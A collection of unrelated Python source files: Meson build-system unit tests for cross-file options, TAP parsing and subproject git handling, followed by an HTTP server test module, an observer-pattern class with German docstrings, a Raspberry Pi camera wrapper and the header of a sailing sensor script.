config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any would
do that can be set for both.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser()
return iter(parser.parse(io.StringIO(s)))
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, num_tests=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, num_tests=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, num_tests=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, num_tests=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, num_tests=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, num_tests=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write("project('{}')".format(project_name))
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', 'meson.test@example.com'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
# Same as `git branch --show-current` but compatible with older git version
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
# If a user has git configuration init.defaultBranch set we want to override that
with tempfile.TemporaryDirectory() as d:
out = git(['--version'], str(d))[1]
if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
extra_cmd = ['--initial-branch', 'master']
else:
extra_cmd = []
self._create_project(path)
self._git(['init'] + extra_cmd, path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-file]
source_url={}
'''.format(os.path.abspath(str(path)))))
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch. Checks the new commit is pulled into existing
# local newbranch. Make sure it does not print spurious 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
# switch current branch to newbranch and pull latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checkout the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
# Create a local project not in a git repository, then update it with
# a git wrap. Without --reset it should print error message and return
# failure. With --reset it should delete existing project and clone the
# new project.
subp_name = 'sub2'
self._create_project(self.subprojects_dir / subp_name)
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self._subprojects_cmd(['update'])
self.assertIn('Not a git repository', cm.exception.output)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def _clang_at_least(compiler: 'Compiler', minver: str, apple_minver: T.Optional[str]) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
if apple_minver is None:
return False
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.CFLAGS_MAPPING.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
def main():
unset_envs()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = []
# Don't use pytest-xdist when running single unit tests since it wastes
# time spawning a lot of processes to distribute tests to in that case.
if not running_single_tests(sys.argv, cases):
pytest_args += ['-n', 'auto']
pytest_args += ['./run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
test_http.py
|
import os
import sys
import time
from threading import Thread
from unittest2 import TestCase
from wsgiref.simple_server import make_server
try:
import json
except ImportError:
import simplejson as json
from mesh.standard import *
from mesh.transport.http import *
from fixtures import *
server = HttpServer([primary_bundle, secondary_bundle])
def http(method, data=None, resource='example', mimetype=None, **params):
path = params.pop('path', None)
if not path:
bundle = params.pop('bundle', 'primary')
version = params.pop('version', (1, 0))
path = '/%s/%d.%d/%s' % (bundle, version[0], version[1], resource)
if mimetype is None:
if method == GET:
mimetype = URLENCODED
elif data:
mimetype = JSON
return server.dispatch(method, path, mimetype, {}, params, data)
class TestHttpServer(TestCase):
def setUp(self):
storage.reset()
def test_not_found(self):
for attempt in ('/primary/1.0/wrong', '/primary/10.0/example', '/wrong/1.0/example'):
response = http(GET, path=attempt)
self.assertEqual(response.status, NOT_FOUND)
def test_json_request(self):
data = {'required_field': 'text'}
response = http(POST, json.dumps(data))
self.assertEqual(response.status, OK)
content = json.loads(response.content[0])
self.assertIsInstance(content, dict)
self.assertIn('id', content)
self.assertIsInstance(content['id'], int)
def test_standard_requests(self):
response = http(POST, json.dumps({}))
self.assertEqual(response.status, INVALID)
response = http(POST, json.dumps({'required_field': 'text'}))
self.assertEqual(response.status, OK)
content = json.loads(response.content[0])
self.assertIsInstance(content, dict)
self.assertIn('id', content)
id = content['id']
self.assertIsInstance(id, int)
response = http(GET, resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id, 'required_field': 'text', 'default_field': 1})
response = http(POST, json.dumps({'default_field': 3}), resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id})
response = http(GET, 'exclude=[required_field]', resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id, 'default_field': 3})
response = http(DELETE, resource='example/%d' % id)
self.assertEqual(response.status, OK)
self.assertEqual(json.loads(response.content[0]), {'id': id})
response = http(GET, resource='example/%d' % id)
self.assertEqual(response.status, GONE)
class _TestHttpClient(TestCase):
@classmethod
def setUpClass(cls):
r, w = os.pipe()
pid = os.fork()
if pid:
cls.shutdown_pipe = w
time.sleep(2)
else:
server = make_server('localhost', 8888, wsgi_server)
thread = Thread(target=server.serve_forever)
thread.start()
os.read(r, 1)
server.shutdown()
thread.join()
os._exit(0)
@classmethod
def tearDownClass(cls):
os.write(cls.shutdown_pipe, '0')
def setUp(self):
storage.reset()
def test_standard_requests(self):
client = HttpClient('localhost:8888', primary_bundle.specify((1, 0)))
#response = client.execute('example', 'create', data={})
response = client.execute('example', 'create', data={'required_field': 'text'})
print response
|
observable.py
|
import queue, threading
class Observable:
"""
Basisklasse für Objekte, die mit dem Observer-Pattern überwacht werden könnnen.
Kann entweder von einer Klasse geerbt werden, damit diese das Observer-Pattern
realisiert oder als eigenständiges Objekt verwendet werden, um einen zentralen
Event-Broker zu erhalten.
"""
def __init__(self, use_event_thread=False):
"""
Konstruktor.
@param: use_event_thread: Separaten Thread verwenden, in dem die Callbacks
ausgeführt werden, statt sie im selben Thread auszuführen, das ein
Ereignis auslöst.
"""
self._event_listeners = {}
self._event_queue = None
self._event_thread = None
if use_event_thread:
self._event_queue = queue.SimpleQueue()
self._event_thread = threading.Thread(target=self._event_thread_main)
self._event_thread.start()
def add_event_listener(self, event, callback):
"""
Registrieren einer weiteren Callback-Funktion für ein Ereignis. Diese wird
zusammen mit den anderen Callback-Funktionen aufgerufen, sobald das überwachte
Objekt das Ereignis auslöst.
Folgende Signatur muss die Callbackfunktion haben:
funktion(event, *args, **kwargs)
@param event: Name des Ereignisses
@param callback: Callback-Funktion
"""
if not event in self._event_listeners:
self._event_listeners[event] = []
self._event_listeners[event].append(callback)
def remove_event_listener(self, event, callback):
"""
Deregistrierung einer Callback-Funktion.
@param event: Name des Ereignisses
@param callback: Callback-Funktion
"""
if event in self._event_listeners and callback in self._event_listeners[event]:
self._event_listeners[event].remove(callback)
def raise_event(self, event, *args, **kwargs):
"""
Methode zum Auslösen eines Ereignisses. Als erster Parameter muss der Name des
Ereignisses übergeben werden. Danach können beliebige weitere Parameter folgen,
die unverändert an die Callback-Funktionen weitergegeben werden.
Es gilt zu beachten, dass die Callback-Funktionen im selben Thread laufen,
der das Ereignis auslöst.
@param event: Name des Ereignisses
@param *args: Beliebige Positionsparameter gemäß Python-Konventionen
@param **kwargs: Beliebige Namensparameter gemäß Python-Konventionen
"""
if not event in self._event_listeners:
return
if self._event_queue:
# Event in die Warteschlange für den Event Thread stellen
self._event_queue.put({
"type": "event",
"event": event,
"args": args,
"kwargs": kwargs,
})
else:
# Callbacks im rufenden Thread direkt ausführen
for callback in self._event_listeners[event]:
callback(*args, **kwargs)
def close(self):
"""
Event Thread beenden, sobald alle anstehenden Ereignisse abgearbeitet wurden.
Bewirkt nichts, wenn dem Konstruktor `use_event_thread = False` mitgegeben wurde.
"""
if self._event_queue:
self._event_queue.put({"type": "close"})
def join_thread(self):
"""
Den Aufrufer so lange blockieren, wie der Event Thread läuft.
"""
if self._event_thread:
self._event_thread.join()
def _event_thread_main(self):
"""
Hauptmethode des Event Threads, in dem die Callbacks ausgeführt werden, wenn dem
Konstruktor der Parameter `use_event_thread = True` mitgegeben wurde.
"""
running = True
while running:
command = self._event_queue.get()
if command["type"] == "event":
# Callbacks zu einem Event ausführen
for callback in self._event_listeners[command["event"]]:
callback(*command["args"], **command["kwargs"])
elif command["type"] == "close":
# Event Thread beenden und keine weiteren Events mehr bearbeiten
running = False
|
camera.py
|
from threading import Thread
import time
import io
from logging import getLogger
from picamera import PiCamera # pylint: disable=import-error
class Camera():
"""Wrapper class for Pi camera"""
TIMEOUT = 5
PICTURE_FORMAT = 'jpeg'
DEFAULT_RESOLUTION = '1280x720'
def __init__(self, register: object):
self.log = getLogger(self.__class__.__name__)
self.log.info('Initiailizing class')
self.register = register
self.frame = None
self.thread = None
self.last_access = 0
self.__name = None
@property
def name(self):
return self.__name.upper()
def change_settings(self, name=None):
if name is not None:
self.__name = name
self.register()
def _start_recording(self):
self.last_access = time.time()
if self.thread is None:
self.log.debug("No thread active, creating new thread")
self.thread = Thread(target=self._thread)
self.log.debug("Starting new thread")
self.thread.start()
self.log.debug("Waiting for camera to start")
while self.frame is None:
time.sleep(0)
def _thread(self):
with PiCamera(resolution=self.DEFAULT_RESOLUTION, framerate=12) as pi_camera:
self.log.info('Camera thread: Starting camera stream')
pi_camera.start_preview()
time.sleep(1)
stream = io.BytesIO()
for _ in pi_camera.capture_continuous(stream, self.PICTURE_FORMAT, use_video_port=True):
stream.seek(0)
self.frame = stream.read()
stream.seek(0)
stream.truncate()
if time.time() - self.last_access > self.TIMEOUT:
self.log.info('Camera thread: Closing camera stream')
break
self.thread = None
def get_frame(self) -> bytes:
"""Returns the latest picture from the camera stream.
Returns:
bytes: Returns the last picture in bytes. Format of picture is "jpeg"
"""
self._start_recording()
return self.frame
|
sailui_publish_sensors.py
|
# encoding: utf8
"""
SailUI - GPS data from serial port parsed and send to InfluxDB
MIT License
Copyright (c) 2021 HadrienLG
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Generic/Built-in
import datetime
import serial
import time
import os
import sys
import threading
from subprocess import check_call
import logging
import paho.mqtt.client as mqtt
# Sensors
from libs.AD import ADS1015 # Amplificateur de gain
from libs.ICM20948 import ICM20948 # Giroscope
from libs.LPS22HB import LPS22HB # Pression, température
from libs.TCS34725 import TCS34725 # Couleurs
#from libs.SHTC3 import SHTC3 # Température, humidité
import busio
import board
import adafruit_shtc3
# Owned
__author__ = "HadrienLG"
__copyright__ = "Copyright 2021, SailUI"
__credits__ = ["HadrienLG", "ChrisBiau",]
__license__ = "MIT"
__version__ = "0.3.0"
__maintainer__ = "HadrienLG"
__email__ = "hadrien.lg@wanadoo.fr"
__status__ = "OnGoing"
__influence__ = {'Waveshare Sense HAT': 'https://www.waveshare.com/wiki/Sense_HAT_(B)'}
# Logging
logging.basicConfig(filename='sailui_publish_sensors.log', level=logging.DEBUG)
